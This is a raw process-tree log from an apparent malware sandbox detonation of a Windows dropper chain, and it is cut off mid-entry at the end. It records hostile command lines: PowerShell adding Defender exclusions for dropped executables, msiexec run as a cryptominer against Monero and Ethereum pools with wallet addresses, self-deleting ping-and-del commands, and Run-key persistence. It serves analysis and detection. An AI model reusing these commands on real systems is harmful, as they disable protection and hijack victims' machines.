C:\Users\Admin\AppData\Local\Temp\yri44wxp.h3u\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\yri44wxp.h3u\askinstall31.exe16⤵
- Suspicious use of SetWindowsHookEx
PID:5748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2houqqwb.dor\toolspab1.exe & exit15⤵
- Suspicious use of SetWindowsHookEx
PID:6696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x2tjb3lt.jhz\GcleanerWW.exe /mixone & exit15⤵PID:6356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j2cuqmzd.4nv\setup_10.2_mix.exe & exit15⤵PID:3104
-
C:\Users\Admin\AppData\Local\Temp\j2cuqmzd.4nv\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\j2cuqmzd.4nv\setup_10.2_mix.exe16⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e2ut2yrj.h1c\file.exe & exit15⤵PID:7348
-
C:\Users\Admin\AppData\Local\Temp\e2ut2yrj.h1c\file.exeC:\Users\Admin\AppData\Local\Temp\e2ut2yrj.h1c\file.exe16⤵PID:6412
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"17⤵PID:2312
-
C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:8180
-
C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe" 1 3.1617537653.6069aa75aac33 10119⤵PID:3988
-
C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RH13SCFPRH\multitimer.exe" 2 3.1617537653.6069aa75aac3320⤵
- Checks for any installed AV software in registry
PID:4452 -
C:\Users\Admin\AppData\Local\Temp\bzjdno1f4bv\vict.exe"C:\Users\Admin\AppData\Local\Temp\bzjdno1f4bv\vict.exe" /VERYSILENT /id=53521⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\is-LVI8S.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-LVI8S.tmp\vict.tmp" /SL5="$806A4,870426,780800,C:\Users\Admin\AppData\Local\Temp\bzjdno1f4bv\vict.exe" /VERYSILENT /id=53522⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\is-OEL24.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-OEL24.tmp\win1host.exe" 53523⤵PID:7916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zml5w0kfqui\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\zml5w0kfqui\cpyrix.exe" /VERYSILENT21⤵PID:8312
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:7004 -
C:\Users\Admin\AppData\Local\Temp\5fdec300-f8f7-4255-840a-eb55edab77db\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5fdec300-f8f7-4255-840a-eb55edab77db\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5fdec300-f8f7-4255-840a-eb55edab77db\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵PID:7356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5fdec300-f8f7-4255-840a-eb55edab77db\test.bat"24⤵PID:2700
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵PID:8636
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵PID:8044
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
PID:976
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵PID:1568
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵
- Suspicious use of SetThreadContext
PID:7588 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:9196
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:7824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\30ar5isekej\app.exe"C:\Users\Admin\AppData\Local\Temp\30ar5isekej\app.exe" /8-2321⤵PID:8552
-
-
C:\Users\Admin\AppData\Local\Temp\nzmbijjuhva\ulc10ehtdu0.exe"C:\Users\Admin\AppData\Local\Temp\nzmbijjuhva\ulc10ehtdu0.exe" /ustwo INSTALL21⤵PID:8868
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ulc10ehtdu0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nzmbijjuhva\ulc10ehtdu0.exe" & exit22⤵PID:6108
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ulc10ehtdu0.exe" /f23⤵
- Kills process with taskkill
PID:8912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fkjrydniivu\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fkjrydniivu\Setup3310.exe" /Verysilent /subid=57721⤵PID:9136
-
C:\Users\Admin\AppData\Local\Temp\is-KFN74.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KFN74.tmp\Setup3310.tmp" /SL5="$5069E,138429,56832,C:\Users\Admin\AppData\Local\Temp\fkjrydniivu\Setup3310.exe" /Verysilent /subid=57722⤵PID:8500
-
C:\Users\Admin\AppData\Local\Temp\is-UTBQA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-UTBQA.tmp\Setup.exe" /Verysilent23⤵PID:6228
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DMLL8C2FLQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\DMLL8C2FLQ\setups.exe" ll18⤵PID:7464
-
C:\Users\Admin\AppData\Local\Temp\is-4D5QB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-4D5QB.tmp\setups.tmp" /SL5="$B0446,454998,229376,C:\Users\Admin\AppData\Local\Temp\DMLL8C2FLQ\setups.exe" ll19⤵PID:5632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"17⤵PID:7884
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"17⤵
- Drops file in Program Files directory
- Modifies registry class
PID:4768 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:7200
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵
- Modifies registry class
PID:5208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"17⤵PID:7936
-
C:\Users\Admin\AppData\Roaming\BDB5.tmp.exe"C:\Users\Admin\AppData\Roaming\BDB5.tmp.exe"18⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:3988 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:8736
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵
- Blocklisted process makes network request
PID:8232
-
-
-
C:\Users\Admin\AppData\Roaming\CA39.tmp.exe"C:\Users\Admin\AppData\Roaming\CA39.tmp.exe"18⤵PID:7284
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"18⤵PID:3204
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:3104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"17⤵
- Checks whether UAC is enabled
PID:7308
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exe /8-2222 & exit15⤵PID:7040
-
C:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exeC:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exe /8-222216⤵PID:8012
-
C:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exe"C:\Users\Admin\AppData\Local\Temp\mtakvvq4.baz\app.exe" /8-222217⤵PID:1264
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i3jyoktu.osm\Four.exe & exit15⤵PID:8260
-
C:\Users\Admin\AppData\Local\Temp\i3jyoktu.osm\Four.exeC:\Users\Admin\AppData\Local\Temp\i3jyoktu.osm\Four.exe16⤵PID:3972
-
C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵
- Drops file in Windows directory
PID:7192 -
C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe" 1 3.1617537752.6069aad86c952 10418⤵PID:8876
-
C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N1O9BQ6682\multitimer.exe" 2 3.1617537752.6069aad86c95219⤵
- Checks for any installed AV software in registry
PID:6784 -
C:\Users\Admin\AppData\Local\Temp\ftxzlstd1lk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ftxzlstd1lk\Setup3310.exe" /Verysilent /subid=57720⤵PID:7164
-
C:\Users\Admin\AppData\Local\Temp\is-1TC8U.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-1TC8U.tmp\Setup3310.tmp" /SL5="$20702,138429,56832,C:\Users\Admin\AppData\Local\Temp\ftxzlstd1lk\Setup3310.exe" /Verysilent /subid=57721⤵PID:4792
-
C:\Users\Admin\AppData\Local\Temp\is-G0MT3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-G0MT3.tmp\Setup.exe" /Verysilent22⤵
- Drops file in Program Files directory
PID:2248
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iiw0nwakcfz\app.exe"C:\Users\Admin\AppData\Local\Temp\iiw0nwakcfz\app.exe" /8-2320⤵PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\lv5y4aq0o14\4pk4ooaomy2.exe"C:\Users\Admin\AppData\Local\Temp\lv5y4aq0o14\4pk4ooaomy2.exe" /ustwo INSTALL20⤵
- Drops file in Windows directory
PID:8180 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4pk4ooaomy2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\lv5y4aq0o14\4pk4ooaomy2.exe" & exit21⤵PID:6484
-
-
-
C:\Users\Admin\AppData\Local\Temp\vj2dgfxca4s\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\vj2dgfxca4s\cpyrix.exe" /VERYSILENT20⤵PID:8256
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵PID:8716
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵PID:5504
-
-
-
C:\Users\Admin\AppData\Local\Temp\22hmwvfu0lx\vict.exe"C:\Users\Admin\AppData\Local\Temp\22hmwvfu0lx\vict.exe" /VERYSILENT /id=53520⤵PID:6612
-
C:\Users\Admin\AppData\Local\Temp\is-U3KHB.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-U3KHB.tmp\vict.tmp" /SL5="$6078A,870426,780800,C:\Users\Admin\AppData\Local\Temp\22hmwvfu0lx\vict.exe" /VERYSILENT /id=53521⤵PID:8464
-
C:\Users\Admin\AppData\Local\Temp\is-SNRB1.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-SNRB1.tmp\win1host.exe" 53522⤵PID:7784
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\VEVWHS5S48\setups.exe"C:\Users\Admin\AppData\Local\Temp\VEVWHS5S48\setups.exe" ll17⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\is-80COC.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-80COC.tmp\setups.tmp" /SL5="$208CC,454998,229376,C:\Users\Admin\AppData\Local\Temp\VEVWHS5S48\setups.exe" ll18⤵PID:4600
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\66-b47f9-7b4-970af-f82ec842ed060\Naedyruwode.exe"C:\Users\Admin\AppData\Local\Temp\66-b47f9-7b4-970af-f82ec842ed060\Naedyruwode.exe"14⤵PID:5168
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 210815⤵
- Suspicious use of SetWindowsHookEx
PID:7944
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5236 -
C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe" 1 3.1617537482.6069a9ca24640 10313⤵
- Executes dropped EXE
- Adds Run key to start application
PID:908 -
C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TFN7MAMTVN\multitimer.exe" 2 3.1617537482.6069a9ca2464014⤵
- Checks computer location settings
- Checks for any installed AV software in registry
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:684 -
C:\Users\Admin\AppData\Local\Temp\vgnqr3iw0rd\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\vgnqr3iw0rd\cpyrix.exe" /VERYSILENT15⤵
- Suspicious use of SetWindowsHookEx
PID:6808 -
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:7424 -
C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵
- Suspicious use of SetWindowsHookEx
PID:7580 -
C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d9eebd1c-402a-42ae-aace-e3c10d8c38bb\AdvancedRun.exe" /SpecialRun 4101d8 758018⤵PID:6080
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:6952
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:4392
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:7732
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:7720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7424 -s 156817⤵
- Program crash
PID:5388
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵
- Suspicious use of SetThreadContext
PID:7532 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:8008
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:5796
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dwitukf3naw\dkhayr1zoav.exe"C:\Users\Admin\AppData\Local\Temp\dwitukf3naw\dkhayr1zoav.exe" /ustwo INSTALL15⤵PID:5392
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dkhayr1zoav.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dwitukf3naw\dkhayr1zoav.exe" & exit16⤵PID:4984
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dkhayr1zoav.exe" /f17⤵
- Kills process with taskkill
PID:6092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rsnlsdrihqo\app.exe"C:\Users\Admin\AppData\Local\Temp\rsnlsdrihqo\app.exe" /8-2315⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\rsnlsdrihqo\app.exe"C:\Users\Admin\AppData\Local\Temp\rsnlsdrihqo\app.exe" /8-2316⤵PID:7332
-
-
-
C:\Users\Admin\AppData\Local\Temp\nk2cumvbpxn\vpn.exe"C:\Users\Admin\AppData\Local\Temp\nk2cumvbpxn\vpn.exe" /silent /subid=48215⤵
- Suspicious use of SetWindowsHookEx
PID:7176 -
C:\Users\Admin\AppData\Local\Temp\is-DUN46.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-DUN46.tmp\vpn.tmp" /SL5="$70054,15170975,270336,C:\Users\Admin\AppData\Local\Temp\nk2cumvbpxn\vpn.exe" /silent /subid=48216⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:7288
-
-
-
C:\Users\Admin\AppData\Local\Temp\vnzzvtrlqmm\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\vnzzvtrlqmm\Setup3310.exe" /Verysilent /subid=57715⤵
- Suspicious use of SetWindowsHookEx
PID:7196 -
C:\Users\Admin\AppData\Local\Temp\is-OGRBJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-OGRBJ.tmp\Setup3310.tmp" /SL5="$60386,138429,56832,C:\Users\Admin\AppData\Local\Temp\vnzzvtrlqmm\Setup3310.exe" /Verysilent /subid=57716⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:7296 -
C:\Users\Admin\AppData\Local\Temp\is-I4DA6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-I4DA6.tmp\Setup.exe" /Verysilent17⤵
- Suspicious use of SetWindowsHookEx
PID:7544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2r3504zccd\vict.exe"C:\Users\Admin\AppData\Local\Temp\u2r3504zccd\vict.exe" /VERYSILENT /id=53515⤵
- Suspicious use of SetWindowsHookEx
PID:7956 -
C:\Users\Admin\AppData\Local\Temp\is-V9NQI.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-V9NQI.tmp\vict.tmp" /SL5="$20306,870426,780800,C:\Users\Admin\AppData\Local\Temp\u2r3504zccd\vict.exe" /VERYSILENT /id=53516⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:8092 -
C:\Users\Admin\AppData\Local\Temp\is-KOB06.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-KOB06.tmp\win1host.exe" 53517⤵
- Suspicious use of SetWindowsHookEx
PID:3748
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A4I2ZO006Z\setups.exe"C:\Users\Admin\AppData\Local\Temp\A4I2ZO006Z\setups.exe" ll12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\is-N2B4L.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-N2B4L.tmp\setups.tmp" /SL5="$2036A,454998,229376,C:\Users\Admin\AppData\Local\Temp\A4I2ZO006Z\setups.exe" ll13⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2112
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3516 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:4716
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵
- Executes dropped EXE
PID:5460
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5776 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:5836
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4092
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\51cldsrmzd1\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\51cldsrmzd1\cpyrix.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5564 -
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2184 -
C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5592 -
C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\455c1bef-c8bf-4570-aa34-e54c07526695\AdvancedRun.exe" /SpecialRun 4101d8 559211⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5760
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵
- Suspicious behavior: EnumeratesProcesses
PID:4740
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:4088
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:5792
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:212
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 181210⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:5172
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5728 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵
- Executes dropped EXE
PID:804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\okdq00sxsu2\vict.exe"C:\Users\Admin\AppData\Local\Temp\okdq00sxsu2\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5732 -
C:\Users\Admin\AppData\Local\Temp\is-4VI9J.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-4VI9J.tmp\vict.tmp" /SL5="$1035E,870426,780800,C:\Users\Admin\AppData\Local\Temp\okdq00sxsu2\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5888 -
C:\Users\Admin\AppData\Local\Temp\is-67ROJ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-67ROJ.tmp\win1host.exe" 53510⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6004 -
C:\Users\Admin\AppData\Local\Temp\eCUEGYWHo.exe"C:\Users\Admin\AppData\Local\Temp\eCUEGYWHo.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1816 -
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:5028
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵PID:5984
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:4444
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 148811⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:7272
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v4yayg0fwi2\p4uee4nr31a.exe"C:\Users\Admin\AppData\Local\Temp\v4yayg0fwi2\p4uee4nr31a.exe"8⤵
- Executes dropped EXE
PID:5780 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\v4yayg0fwi2\p4uee4nr31a.exe"9⤵PID:6068
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\s4yjbw4app0\muwrgmlshuf.exe"C:\Users\Admin\AppData\Local\Temp\s4yjbw4app0\muwrgmlshuf.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5724 -
C:\Users\Admin\AppData\Local\Temp\is-9VVUA.tmp\muwrgmlshuf.tmp"C:\Users\Admin\AppData\Local\Temp\is-9VVUA.tmp\muwrgmlshuf.tmp" /SL5="$20356,2592217,780800,C:\Users\Admin\AppData\Local\Temp\s4yjbw4app0\muwrgmlshuf.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5904 -
C:\Users\Admin\AppData\Local\Temp\is-MONLL.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-MONLL.tmp\winlthsth.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5944 -
C:\Users\Admin\AppData\Local\Temp\TSCfPHLZs.exe"C:\Users\Admin\AppData\Local\Temp\TSCfPHLZs.exe"11⤵
